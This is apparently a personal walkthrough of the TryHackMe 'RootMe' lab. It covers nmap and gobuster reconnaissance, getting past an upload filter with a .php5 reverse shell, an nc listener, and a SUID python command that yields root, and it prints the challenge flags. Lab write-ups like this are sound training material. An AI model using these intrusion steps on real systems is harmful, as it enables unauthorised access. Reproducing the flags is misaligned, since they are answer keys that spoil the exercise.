RootMe

THM RootMe

Reconnaissance

Scan the machine, how many ports are open?

nmap -sV 10.80.157.137

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Answer 2

What version of Apache is running?

Answer 2.4.41

What service is running on port 22?

Answer ssh

Find directories on the web server using the GoBuster tool

Answer gobuster dir -u 10.80.157.137 -w /usr/share/wordlists/dirb/common.txt -x php,html,js,txt,asp,aspx,jsp

What is the hidden directory?

Answer /panel/

Getting a shell

Find a form to upload and get a reverse shell, and find the flag user.txt

Uploaded a php-reverse-shell while running nc on my system hhowever it looks like .php files are not allowed to be uploaded.

After testing a few diffrent things it looks like you can upload php files with diffrent extensions such as php5 however after it is uploaded it does not automatically execute, you need to go to the /uploads/ directory and click the php file for the shell to open or curl the file in another terminal.

nc -lvnp 4444
find / -type f -name user.txt
cat /var/www/user.txt

Answer THM{y0u_g0t_a_sh3ll}

Privilege escalation

Search for files with SUID permission, which file is weird?

This one stumped me, I've not done much with privilege escilation before so this took me quite a while to figure out what can be used to do this, after finding a repo by gurkylee on linux privilege escalation basics I noticed python can be used.

find / -user root -type f -perm /4000 2>/dev/null

This outputs quite a lot but it looks like python is in /usr/bin

Answer /usr/bin/python

Find a form to escalate your privileges

I've never tried privilege escalation with python but there is a section in the repo I found for abusing sudo binaries to gain root, there is a python section there that works without using sudo which gives you root.

python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

root.txt

Now we have root we can search for root.txt

find / -type f -name root.txt  2>/dev/null
/root/root.txt
cat /root/root.txt

Answer THM{pr1v1l3g3_3sc4l4t10n}